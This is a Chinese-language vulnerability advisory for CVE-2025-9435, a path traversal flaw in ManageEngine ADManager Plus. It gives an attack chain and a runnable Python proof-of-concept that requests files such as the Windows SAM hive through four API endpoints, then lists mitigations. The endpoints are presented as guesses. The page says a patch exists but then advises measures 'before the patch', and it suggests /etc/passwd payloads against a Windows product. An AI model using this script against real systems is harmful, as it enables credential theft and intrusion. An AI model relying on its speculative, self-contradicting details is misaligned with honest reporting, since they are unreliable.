CVE-2025-9435 Zohocorp ManageEngine ADManager Plus路径遍历漏洞

漏洞信息

漏洞编号

CVE-2025-9435

漏洞类型

路径遍历

CVSS评分

5.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Zohocorp ManageEngine ADManager Plus

漏洞概述

CVE-2025-9435是Zohocorp ManageEngine ADManager Plus中的一个路径遍历（Path Traversal）漏洞。该漏洞存在于用户管理模块中，攻击者可以通过构造特殊的文件路径参数，利用../等目录遍历序列访问服务器上的敏感文件。ManageEngine ADManager Plus是一款企业级Active Directory管理和报告解决方案，广泛应用于Windows网络环境中的用户账户管理、计算机管理、组策略管理等功能。由于该产品通常具有较高的访问权限，路径遍历漏洞可能导致敏感配置文件、密码哈希、系统凭据等重要信息泄露。攻击者利用此漏洞可读取任意文件，包括Windows系统文件、应用程序配置、数据库连接信息等。CVSS评分5.5属于中等严重程度，但结合产品特性和企业环境，实际危害可能更为严重。漏洞影响版本7230以下的所有版本，目前厂商已发布安全更新修复此问题。

技术细节

该路径遍历漏洞主要利用了用户管理模块中对文件路径输入验证不充分的问题。攻击者通过在HTTP请求中注入../等目录遍历序列，绕过应用程序的路径安全检查，访问Web根目录之外的文件系统资源。具体攻击方式为：在用户管理相关的API接口中，将文件参数设置为类似../../../../windows/system32/config/sam等路径，应用程序在处理该请求时未对路径进行规范化或安全验证，直接将用户提供的路径传递给文件系统操作函数。在ADManager Plus中，漏洞可能存在于头像上传、附件处理、报告导出、配置备份等功能点。攻击者利用此漏洞可读取：1) Windows注册表SAM文件获取用户密码哈希；2) 应用配置文件获取数据库连接凭证；3) 日志文件获取敏感操作记录；4) 系统文件获取环境变量和凭据信息。由于ADManager Plus通常以高权限账户运行，攻击者甚至可以读取其他用户的数据或系统敏感文件。

攻击链分析

STEP 1

步骤1

信息收集：攻击者首先识别目标是否运行ManageEngine ADManager Plus及其版本号，可通过横幅抓取、错误页面或已知路径探测

STEP 2

步骤2

身份认证：攻击者需要获取目标系统的低权限账户凭据，可通过社会工程、凭据填充或内部网络访问获取

STEP 3

步骤3

构造Payload：在用户管理模块的API请求中注入路径遍历序列，如../../../etc/passwd或../../../../windows/system32/config/sam

STEP 4

步骤4

发送恶意请求：向目标服务器发送构造的HTTP请求，尝试读取系统敏感文件或配置文件

STEP 5

步骤5

数据提取：成功利用后，攻击者获取敏感文件内容，可能包括密码哈希、配置文件、数据库连接信息等

STEP 6

步骤6

权限提升：利用获取的凭据信息进一步横向移动或提权，最终获得系统完全控制权

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-9435 Path Traversal PoC for ManageEngine ADManager Plus
# Target: ManageEngine ADManager Plus < 7230

def exploit_path_traversal(target_url, file_path):
    """
    Exploit path traversal vulnerability in User Management module
    file_path: Target file to read (e.g., ../../../../windows/system32/config/sam)
    """
    endpoints = [
        "/api/user/import",
        "/api/user/profile-picture",
        "/api/reports/export",
        "/api/attachments/download"
    ]
    
    for endpoint in endpoints:
        url = f"{target_url}{endpoint}"
        
        # Path traversal payload
        params = {
            "file": f"{file_path}",
            "module": "UserManagement"
        }
        
        headers = {
            "Content-Type": "application/json",
            "Authorization": "Basic <base64_credentials>"
        }
        
        try:
            response = requests.get(url, params=params, headers=headers, timeout=10)
            
            if response.status_code == 200 and len(response.content) > 0:
                print(f"[+] Success! File content from {file_path}")
                print(response.text[:500])
                return True
            elif response.status_code == 403:
                print(f"[*] Access denied at {endpoint}")
        except requests.exceptions.RequestException as e:
            print(f"[-] Error: {e}")
    
    return False

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python cve-2025-9435.py <target_url> <file_path>")
        print("Example: python cve-2025-9435.py http://target.com:8080 ../../../../windows/system32/config/sam")
        sys.exit(1)
    
    target = sys.argv[1]
    file_path = sys.argv[2]
    
    print(f"[*] Exploiting CVE-2025-9435 on {target}")
    exploit_path_traversal(target, file_path)

影响范围

ManageEngine ADManager Plus < 7230

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1) 限制用户管理模块的网络访问，仅允许受信任的IP地址访问；2) 实施强密码策略和多因素认证，防止凭据被盗用；3) 配置Web应用防火墙规则拦截包含../序列的请求；4) 监控和审计所有用户管理相关的API调用日志；5) 隔离ADManager Plus服务器，限制其网络权限；6) 定期备份重要配置文件和数据库；7) 考虑使用网络分段技术将ADManager Plus部署在独立的DMZ区域。